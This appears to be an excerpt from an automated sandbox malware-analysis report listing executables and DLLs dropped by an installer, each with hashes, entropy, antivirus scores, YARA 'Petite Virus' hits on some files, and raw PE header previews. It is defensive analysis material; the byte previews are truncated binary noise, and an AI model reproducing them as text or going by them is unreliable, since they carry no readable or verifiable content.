                                                                                                          SSDEEP:24576:sxJadtgtogJr8nFWojn51vDBgpOpJyqMvDQAmJ:bWoer+Fhjn51vDBgpKMvDeJ
                                                                                                          MD5:AF785965AB0BF2474B3DD6E53DA2F368
                                                                                                          SHA1:EF9EECBD07CCBD3069B30AA1671C2093FA38FEB6
                                                                                                          SHA-256:8CDF4CAD48406CDB2FF6F4F08A8BCAF41B9A5A656CC341F2757B610A7ACA706A
                                                                                                          SHA-512:5F69C61E38D6930F8084DCE001BD592C681850F073F1B82E2914F448750E7514E2B0F8F7591BCB089C84D91FC9F51E96CFC03D204AE052564820723E57B6FE27
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........#...).R...................p...............................P......5.....@... .........................WD..............p.......................|;...........................+......................X................................text....Q.......R..................`..`.data...L....p.......V..............@....rdata...............Z..............@..@/4...........p.......F..............@..@.bss....4....p...........................edata..WD.......F...>..............@..@.idata..............................@....CRT....,...........................@....tls................................@....rsrc...p...........................@..@.reloc..|;.......<..................@..B........................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):772608
                                                                                                          Entropy (8bit):6.546391052615969
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:Q75mFL0MNnM/SQdtij4UujFhGiNV1SckT3wio2L2jV6EfnQ29mwF3s4iGtInw1m8:AwN0e0lN1fnQUFccGns9ukS6
                                                                                                          MD5:B3B487FC3832B607A853211E8AC42CAD
                                                                                                          SHA1:06E32C28103D33DAD53BE06C894203F8808D38C1
                                                                                                          SHA-256:30BC10BD6E5B2DB1ACE93C2004E24C128D20C242063D4F0889FD3FB3E284A9E4
                                                                                                          SHA-512:FA6BDBA4F2A0CF4CCA40A333B69FD041D9EDC0736EDA206F17F10AF5505CC4688B0401A3CAD2D2F69392E752B8877DB593C7872BCDB133DC785A200FF38598BB
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....1.d.................D..........$].......`....@.......................................@......@...................0..o............p...(...................`...............................P......................X........ .......................text...h4.......6.................. ..`.itext.......P.......:.............. ..`.data....7...`...8...H..............@....bss....0i...............................idata..............................@....didata...... ......................@....edata..o....0......................@..@.tls.........@...........................rdata..]....P......................@..@.reloc.......`......................@..B.rsrc....(...p...(..................@..@....................................@..@................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):112640
                                                                                                          Entropy (8bit):6.540227486061059
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:1536:45vq1zsdXYjZmGz9anu3MwjLA/eeiUKJP3Djl23HTKJ7WMU3lPyK+ZSrKxV/UJ9G:vzMMg/gMKeGsMIl6K+Zvry5zNY
                                                                                                          MD5:BDB65DCE335AC29ECCBC2CA7A7AD36B7
                                                                                                          SHA1:CE7678DCF7AF0DBF9649B660DB63DB87325E6F69
                                                                                                          SHA-256:7EC9EE07BFD67150D1BC26158000436B63CA8DBB2623095C049E06091FA374C3
                                                                                                          SHA-512:8AABCA6BE47A365ACD28DF8224F9B9B5E1654F67E825719286697FB9E1B75478DDDF31671E3921F06632EED5BB3DDA91D81E48D4550C2DCD8E2404D566F1BC29
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................f...N......0u............@.....................................................................2.......v...............................h...................................................................................CODE....Pe.......f.................. ..`DATA....D............j..............@...BSS......................................idata..v...........................@....edata..2...........................@..P.reloc..h...........................@..P.rsrc...............................@..P....................................@..P................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):16910
                                                                                                          Entropy (8bit):5.289608933932413
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:ohtyjknGC7hipL+9mLYFOozxkdlDNUwS5Qq:UGknGC74l+MUFI7C
                                                                                                          MD5:2F040608E68E679DD42B7D8D3FCA563E
                                                                                                          SHA1:4B2C3A6B8902E32CDA33A241B24A79BE380C55FC
                                                                                                          SHA-256:6B980CADC3E7047CC51AD1234CB7E76FF520149A746CB64E5631AF1EA1939962
                                                                                                          SHA-512:718AF5BE259973732179ABA45B672637FCA21AE575B4115A62139A751C04F267F355B8F7F7432B56719D91390DABA774B39283CBCFE18F09CA033389FB31A4FC
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........B.........#.........>...f...........0.....h......................... ................ .........................{.......|...............................$...........................pA.......................................................text...4...........................`.P`.data...<....0......."..............@.0..rdata.......@.......$..............@.`@/4...........P.......(..............@.0@.bss.....d...`........................`..edata..{............2..............@.0@.idata..|............4..............@.0..CRT....,............:..............@.0..tls.................<..............@.0..reloc..$............>..............@.0B................................................................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):68042
                                                                                                          Entropy (8bit):6.090396152400884
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:RX3HAdi7wgCsL6dVSngk2IFm3ZJVRDBLRROBBKRzPm3YRiF+ixh:NHQpe6SnZQLjICPm3Ytib
                                                                                                          MD5:5DDA5D34AC6AA5691031FD4241538C82
                                                                                                          SHA1:22788C2EBE5D50FF36345EA0CB16035FABAB8A6C
                                                                                                          SHA-256:DE1A9DD251E29718176F675455592BC1904086B9235A89E6263A3085DDDCBB63
                                                                                                          SHA-512:08385DE11A0943A6F05AC3F8F1E309E1799D28EA50BF1CA6CEB01E128C0CD7518A64E55E8B56A4B8EF9DB3ECD2DE33D39779DCA1FBF21DE735E489A09159A1FD
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........V......#...&...........................d......................................@... ..............................0..t....`..P....................p.......................................................1..H............................text...d...........................`..`.data...L...........................@....rdata..\...........................@..@/4.......2.......4..................@..@.bss.....................................edata..............................@..@.idata..t....0......................@....CRT....0....@......................@....tls.........P......................@....rsrc...P....`......................@....reloc.......p......................@..B........................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):648384
                                                                                                          Entropy (8bit):6.666474522542094
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:gAQxmcOwzIYhoz/eZz4gOIwEODAAwnq6Nql1:gvmfAI6oz/uOIyDAAwDNql1
                                                                                                          MD5:CE7DE939D74321A7D0E9BDF534B89AB9
                                                                                                          SHA1:56082B4E09A543562297E098A36AADC3338DEEC5
                                                                                                          SHA-256:A9DC70ABB4B59989C63B91755BA6177C491F6B4FE8D0BFBDF21A4CCF431BC939
                                                                                                          SHA-512:03C366506481B70E8BF6554727956E0340D27CB2853609D6210472AEDF4B3180C52AAD9152BC2CCCBA005723F5B2E3B5A19D0DCE8B8D1E0897F894A4BFEEFE55
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...".t.........................g.........................0................ ..........................................................,.......=..........................,=.......................................................text....r.......t..................`.P`.data............ ...x..............@.`..rdata..L...........................@.`@/4...................\..............@.0@.bss..................................`..edata...............`..............@.0@.idata...............j..............@.0..CRT....,............v..............@.0..tls.................x..............@.0..reloc...=.......>...z..............@.0B................................................................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):43520
                                                                                                          Entropy (8bit):6.232860260916194
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:XozEJVjDF38DrOPwLg0cAY7K+k+Y+TyHMjMbHVJx9jm3LkkteFfXbBekdAnPKx:Xo4JJDirOoLg0C7F/rDGdpB52PK
                                                                                                          MD5:B162992412E08888456AE13BA8BD3D90
                                                                                                          SHA1:095FA02EB14FD4BD6EA06F112FDAFE97522F9888
                                                                                                          SHA-256:2581A6BCA6F4B307658B24A7584A6B300C91E32F2FE06EB1DCA00ADCE60FA723
                                                                                                          SHA-512:078594DE66F7E065DCB48DA7C13A6A15F8516800D5CEE14BA267F43DC73BC38779A4A4ED9444AFDFA581523392CBE06B0241AA8EC0148E6BCEA8E23B78486824
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....z.......D................,n.........................p.......`........ ...................... .......0...............................`..............................t........................0...............................text....x.......z..................`.P`.data...,............~..............@.0..rdata..............................@.P@.eh_fram|...........................@.0@.bss.....B............................`..edata....... ......................@.0@.idata.......0......................@.0..CRT....,....@......................@.0..tls.........P......................@.0..reloc.......`......................@.0B................................................................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):240654
                                                                                                          Entropy (8bit):6.518503846592995
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:yZDfF4DjzIHBV+bUeenu+t+oSTdjpNZ7utS81qpHW4paP2L:ekjzMBVKXeuq+oSTdjpr7N8f+L
                                                                                                          MD5:4F0C85351AEC4B00300451424DB4B5A4
                                                                                                          SHA1:BB66D807EDE0D7D86438207EB850F50126924C9D
                                                                                                          SHA-256:CC0B53969670C7275A855557EA16182C932160BC0F8543EFFC570F760AE2185E
                                                                                                          SHA-512:80C84403ED47380FF75EBA50A23E565F7E5C68C7BE8C208A5A48B7FB0798FF51F3D33780C902A6F8AB0E6DB328860C071C77B93AC88CADF84FEF7DF34DE3E2DA
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....H...................`.....g.................................\........ .........................o.......\...............................t............................S.......................................................text...dF.......H..................`.P`.data...X....`.......L..............@.P..rdata.......p.......N..............@.`@/4.......<.......>...T..............@.0@.bss..................................`..edata..o...........................@.0@.idata..\...........................@.0..CRT....,...........................@.0..tls................................@.0..reloc..t...........................@.0B................................................................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):36416
                                                                                                          Entropy (8bit):7.842278356440954
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:lshkyPXvH6bPACtmb8boNQdVfCXewki/OvXEApOqmFfSq1oIQMW:lsh3n5Pb8boOdVCuwNEXEAonfSq1JQb
                                                                                                          MD5:BEBA64522AA8265751187E38D1FC0653
                                                                                                          SHA1:63FFB566AA7B2242FCC91A67E0EDA940C4596E8E
                                                                                                          SHA-256:8C58BC6C89772D0CD72C61E6CF982A3F51DEE9AAC946E076A0273CD3AAF3BE9D
                                                                                                          SHA-512:13214E191C6D94DB914835577C048ADF2240C7335C0A2C2274C096114B7B75CD2CE13A76316963CCD55EE371631998FAC678FCF82AE2AE178B7813B2C35C6651
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Preview:MZ......................@...................................D.... ..PE..L....}.Q...........!................6 ............`..........................0......................................d#.......!..........@...................t...........................................................................................................................`....rsrc...........@...................@..@....................................@................ ......................`.......................................X...{.......j...f.!.PRj.....j..S.ERROR!.Corrupt Data!... c.f.`P....h.p..j..P..C.h..`..<$.3f....t...;S.^......Vj.PWj.j.Vj.PW....Y.Yf..X........X....................Z...t..$.4..l$..m..J...R...z.....XXXXZt.D$...*.P(.*.....P...s.j.h`...h`.....j.h....h....j.3.3.0_.K~..[...s.3..^......s...$A."...L$..<.........;D$....;D$......$. ............u...........V+.48.^...u.........A............r..I.....................]...............'..................................A...%...........
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):394752
                                                                                                          Entropy (8bit):6.662070316214798
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:uAlmRfeS+mOxv8bgDTuXU54l8WybBE36IpuIT9nxQPQnhH/a0CRdWqWJwGKp:zlm0S+SEuXU54NylJIJ9KPQnhilRsVJ
                                                                                                          MD5:A4123DE65270C91849FFEB8515A864C4
                                                                                                          SHA1:93971C6BB25F3F4D54D4DF6C0C002199A2F84525
                                                                                                          SHA-256:43A9928D6604BF604E43C2E1BAB30AE1654B3C26E66475F9488A95D89A4E6113
                                                                                                          SHA-512:D0834F7DB31ABA8AA9D97479938DA2D4CD945F76DC2203D60D24C75D29D36E635C2B0D97425027C4DEBA558B8A41A77E288F73263FA9ABC12C54E93510E3D384
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......KL...-d..-d..-d..U...-d..Be..-d.TEe..-d..-e.:-d..Ba..-d..B`..-d..Bg..-d..B`.c-d..Bd..-d..B...-d..Bf..-d.Rich.-d.........................PE..L.....b`...........!.....L..........+S.......`...............................P............@.................................L........... .................... ..\ ..$...............................@...@............`...............................text...NK.......L.................. ..`.rdata......`.......P..............@..@.data...............................@....rsrc... ...........................@..@.reloc..\ ... ..."..................@..B................................................................................................................................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):562190
                                                                                                          Entropy (8bit):6.388293171196564
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:uCtwsqIfrUmUBrusLdVAjA1ATAtuQ8T2Q8TOksqHOuCHWoEuEc4XEmEVEEAcIHAj:uqiIoYmOuNNQ1zU/xGl
                                                                                                          MD5:713D04E7396D3A4EFF6BF8BA8B9CB2CD
                                                                                                          SHA1:D824F373C219B33988CFA3D4A53E7C2BFA096870
                                                                                                          SHA-256:00FB8E819FFDD2C246F0E6C8C3767A08E704812C6443C8D657DFB388AEB27CF9
                                                                                                          SHA-512:30311238EF1EE3B97DF92084323A54764D79DED62BFEB12757F4C14F709EB2DBDF6625C260FB47DA2D600E015750394AA914FC0CC40978BA494D860710F9DC40
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Rd...............(..........................@.......................................@... .................................H...........................................................D...........................l............................text...T...........................`..`.data...X...........................@....rdata..H...........................@..@/4......P...........................@..@.bss....t................................idata..H............d..............@....CRT....0............n..............@....tls.................p..............@....rsrc................r..............@....reloc...............x..............@..B................................................................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):149845
                                                                                                          Entropy (8bit):7.893881970959476
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3072:y0z4JQHu5EvSA/JqiK2s6g+hUCQiMVQ623hi3JKz8KQP6ZwhQrNrbZ:yUju5GY7l+CCYVQ62YUzXQiqhQrJbZ
                                                                                                          MD5:526E02E9EB8953655EB293D8BAC59C8F
                                                                                                          SHA1:7CA6025602681EF6EFDEE21CD11165A4A70AA6FE
                                                                                                          SHA-256:E2175E48A93B2A7FA25ACC6879F3676E04A0C11BB8CDFD8D305E35FD9B5BBBB4
                                                                                                          SHA-512:053EB66D17E5652A12D5F7FAF03F02F35D1E18146EE38308E39838647F91517F8A9DC0B7A7748225F2F48B8F0347B0A33215D7983E85FCA55EF8679564471F0B
                                                                                                          Malicious:true
                                                                                                          Yara Hits:
                                                                                                          • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-J3HC1.tmp, Author: Joe Security
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                                          Preview:MZ......................@...................................D.... ..PE..L....r.[...........!....U....D............... ............................... ............@.........................P...........d............................N..........................................................8............................................@..................@..@.rsrc................B..............@..@.......................................@petite..U.......U....F..............`..`.....................................5....`K...=1.;;..s}....3500.z.<..]goR.lVO..C..j...........O......9#f.S.$1.b.D.8...VX....sb .A.%I......B.........R...Z5.............y......_W.0.!..T..nT.V..J..s.1`..V...Cb.2x0......0B...4...D.`...!.>[7..^;w'.u"W/...).P.m...P.......qF<.~1..T.>F.F.Rr.`...N....3$...w.L..P..SQP]C^.....2...%5.v...3.a`.k....q.0.o..A......k.....B..P.h.fy..jyb...<t$.%c-...<9.1#2.7./0.j.o#~...,!fuJ.M..a...(...0@.........,..t.3d"qva....fm.=.....]....s...z}-X..3................y>.!......g..E
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):512014
                                                                                                          Entropy (8bit):6.566561154468342
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:BNKab1bu1dEpBZvkO4KTYnyA0bFHmufLKNs3gv:rKcozEpbvkOCyA0xGufLKau
                                                                                                          MD5:C4A2068C59597175CD1A29F3E7F31BC1
                                                                                                          SHA1:89DE0169028E2BDD5F87A51E2251F7364981044D
                                                                                                          SHA-256:7AE79F834A4B875A14D63A0DB356EEC1D356F8E64FF9964E458D1C2050E5D180
                                                                                                          SHA-512:0989EA9E0EFADF1F6C31E7FC243371BB92BFD1446CF62798DCA38A021FAD8B6ADB0AEABDFBDC5CE8B71FE920E341FC8AB4E906B1839C6E469C75D8148A74A08A
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P/.d...........#...(.l.........................n.........................P............@... ..........................:........... .......................0..L...........................d...........................P............................text....k.......l..................`..`.data................p..............@....rdata...t.......v...r..............@..@/4......L...........................@..@.bss....X................................edata...:.......<...j..............@..@.idata..............................@....CRT....,...........................@....tls................................@....rsrc........ ......................@....reloc..L....0......................@..B........................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):34392
                                                                                                          Entropy (8bit):7.81689943223162
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:mYBs3O9YL558R6R8P8W2rjQZQtfTIxRYsetoPNvPWIl+syr:vsUY15mqzW2u8rIxisFcJr
                                                                                                          MD5:EA245B00B9D27EF2BD96548A50A9CC2C
                                                                                                          SHA1:8463FDCDD5CED10C519EE0B406408AE55368E094
                                                                                                          SHA-256:4824A06B819CBE49C485D68A9802D9DAE3E3C54D4C2D8B706C8A87B56CEEFBF3
                                                                                                          SHA-512:EF1E107571402925AB5B1D9B096D7CEFF39C1245A23692A3976164D0DE0314F726CCA0CB10246FE58A13618FD5629A92025628373B3264153FC1D79B0415D9A7
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ph..4...4...4.......0...[...0...[...6...4.......V...0...`*..........5....)......Rich4...........................PE..L.....T...........!................6 .......................................0......................................D#..y....!..d.......X............................................................................................................................z..................`....rsrc...........X...................@..@....................................`...petite....... ......................`...................................................................................................................................................................................................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):7910
                                                                                                          Entropy (8bit):6.931925007191986
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:piDl1jKrGer007ia6abHX0d/aeHeN+VPHIJQxNiJCl9AK0f:IDJ9aDb30dCe+4PHIJrJCl9AK0f
                                                                                                          MD5:1268DEA570A7511FDC8E70C1149F6743
                                                                                                          SHA1:1D646FC69145EC6A4C0C9CAD80626AD40F22E8CD
                                                                                                          SHA-256:F266DBA7B23321BF963C8D8B1257A50E1467FAAAB9952EF7FFED1B6844616649
                                                                                                          SHA-512:E19F0EA39FF7AA11830AF5AAD53343288C742BE22299C815C84D24251FA2643B1E0401AF04E5F9B25CAB29601EA56783522DDB06C4195C6A609804880BAE9E9B
                                                                                                          Malicious:false
                                                                                                          Yara Hits:
                                                                                                          • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-L705K.tmp, Author: Joe Security
                                                                                                          Preview:MZ......................@...................................D.... ..PE..L.....V...........!.................p.......0............................................@.........................Pr.......q..d....P.......................%.......................................................q..8....................................@..........................@..@.rsrc........P......................@..@.............`.........................@petite.......p......................`..`.........................................|7{M..... ........r B`.Zr..P.........T}.e..YJ...=.X..q.}......b.I...G.....^.d...R..-R.....d_.......K.q.H.A=.-S..,_.....L...........2.............u.u.%...:.q....c.[.....`...\.X..8..B.@L..3.7.q.....)!.- ...D.....p...J...RU..Q.A..[.#&..R.....".+4...px/7..\....4...., ..8...5.hV.>] ....3.-.<..I+.<r..T..H,Q..!..i--..+.Zq.[...H... ...N.8..#...a.x.iU.G..-_..R....Z(cT%.....S.P.U:g?...;....&....@..KI.X.Q..PQ..v..*....{..~..}..f....c..`....Q...q..%......,j.4.Y..)....Cf7..
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):39304
                                                                                                          Entropy (8bit):7.819409739152795
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:i5GGx+OZPWuGdoiwUpPLH7IN3x1eW0kIAJbfT13MMnahRlmftuohQf:i5DxDPWMApPLsNhkVkI6R3TnalauoQ
                                                                                                          MD5:C7A50ACE28DDE05B897E000FA398BBCE
                                                                                                          SHA1:33DA507B06614F890D8C8239E71D3D1372E61DAA
                                                                                                          SHA-256:F02979610F9BE2F267AA3260BB3DF0F79EEEB6F491A77EBBE719A44814602BCC
                                                                                                          SHA-512:4CD7F851C7778C99AFED492A040597356F1596BD81548C803C45565975CA6F075D61BC497FCE68C6B4FEDC1D0B5FD0D84FEAA187DC5E149F4E8E44492D999358
                                                                                                          Malicious:false
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....."b...........!.........x.......P.......................................`.......Z....@.........................PR.......Q..d....0..0............}......D........................................................Q..8.................................... .......t..................@..@.rsrc.... ...0.......v..............@..@petite.......P.......z..............`..`......................p..k..K..i{..\.H..'.|w.t...\..dkB%..i.cX...`*B...m.X..A.NU.i.I. J.I....x-.e2n.IA.2.:..2G5Z/.+(8w.S<...`ML........!..%+.r.s.1.~.D...]......U..q3.....9..?y.>j.E.T...Y..D..>..aJ......P^Y..w?.9w.,...+C^.[....|..'.....7..F%..A.....)..b.)8.2Q`.v.F=.."S*..{z...z-H=....L_....RM..s......H2P1a....[..i. 2..~.?...+R... .m(.I..X...H.g.Z..i..G.?.(......e.:.B......fh......gl.x.Z......I>..#....Hgv.;g.@ l.$(...0.........l.>.p..z;A.@...*4v..x.U.gU..Bqqb..6.x...D.....cIE(5m.g}J..
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):127669
                                                                                                          Entropy (8bit):7.952352167575405
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3072:kdGUCKL7Wn/OzU2ThapTv773+HMnBasgGlBM:dn/mU8K/3EgNgoM
                                                                                                          MD5:75C1D7A3BDF1A309C540B998901A35A7
                                                                                                          SHA1:B06FEEAC73D496C435C66B9B7FF7514CBE768D84
                                                                                                          SHA-256:6303F205127C3B16D9CF1BDF4617C96109A03C5F2669341FBC0E1D37CD776B29
                                                                                                          SHA-512:8D2BBB7A7AD34529117C8D5A122F4DAF38EA684AACD09D5AD0051FA41264F91FD5D86679A57913E5ADA917F94A5EF693C39EBD8B465D7E69EF5D53EF941AD2EE
                                                                                                          Malicious:false
                                                                                                          Yara Hits:
                                                                                                          • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-M7CIT.tmp, Author: Joe Security
                                                                                                          Preview:MZ......................@...................................D.... ..PE..L....O?\...........!.................`.......................................p............@..........................b.......a.......0..@...........................................................................<b..H.................................... ..........................@..@.rsrc........0......................@..@......... ...@.........................@petite.......`......................`..`..........................................fE...nj.:<...n...1..}..r..". .S(...#!............7..5.Q..0..}.. .....^y...U...@..3.........&.lp(.pt.a......!..`@C.O3G7..."\..w.1u.$4..1h...M...K6.L...L..~.w...b2x-.......9k".....".V\............o..................qO&.......4(."0.Zy....2..Y..Z..:2.XM..D....a&..&.L,......./+......c<...^.2.x0..H.618....Q.Q.5.%...Z1.I.......a...q-}.0..D....o.!.....O.......B....# O.!....cY5.#...n.`..1...r!.)].:...m.f.....x....N"t.j..l.....:/...,.v........8F.N...X..j.R......"...&...
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):36752
                                                                                                          Entropy (8bit):7.780431937344781
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:E7epCl6I8YbTvEKXQ2vm+iocmmMt7KjuDnlVahRlmftuY5B:EepUv8aZvmd+7nDDalauy
                                                                                                          MD5:9FF783BB73F8868FA6599CDE65ED21D7
                                                                                                          SHA1:F515F91D62D36DC64ADAA06FA0EF6CF769376BDF
                                                                                                          SHA-256:E0234AF5F71592C472439536E710BA8105D62DFA68722965DF87FED50BAB1816
                                                                                                          SHA-512:C9D3C3502601026B6D55A91C583E0BB607BFC695409B984C0561D0CBE7D4F8BD231BC614E0EC1621C287BF0F207017D3E041694320E692FF00BC2220BFA26C26
                                                                                                          Malicious:false
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b...........!.........n.......................................................B....@.........................P...........d.......@............s.......x..........................................................8............................................j..................@..@.rsrc.... ...........l..............@..@petite...............p..............`..`..................8..u...I.x|}...g{...@..ffe.c4.-.Bj..........U.J.`..s.N:`..I@;..B.kbmj..E%2. `....".]&.&.).BB...E..4u'.....Q.......%....V.............5...y....E..q<w.....j...B..O...p....*.X...m...= .X..........4........~~.8.F@.V...6....;?.5..)S.m.9U......^.zO!1o.F.E. ...H=`2...9.(...4).E.!G..;R.1.#.h0..(*..t8..O...Td.d..~...l.a..U...b<../..W....M6...U*G..II.x........>..I[...v.N/.V..3..Y.c...Zh.i..i.....n....M..D....5o."....(.9.+..z...._$t.T...X#\...N....Q%...>U..|....J
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
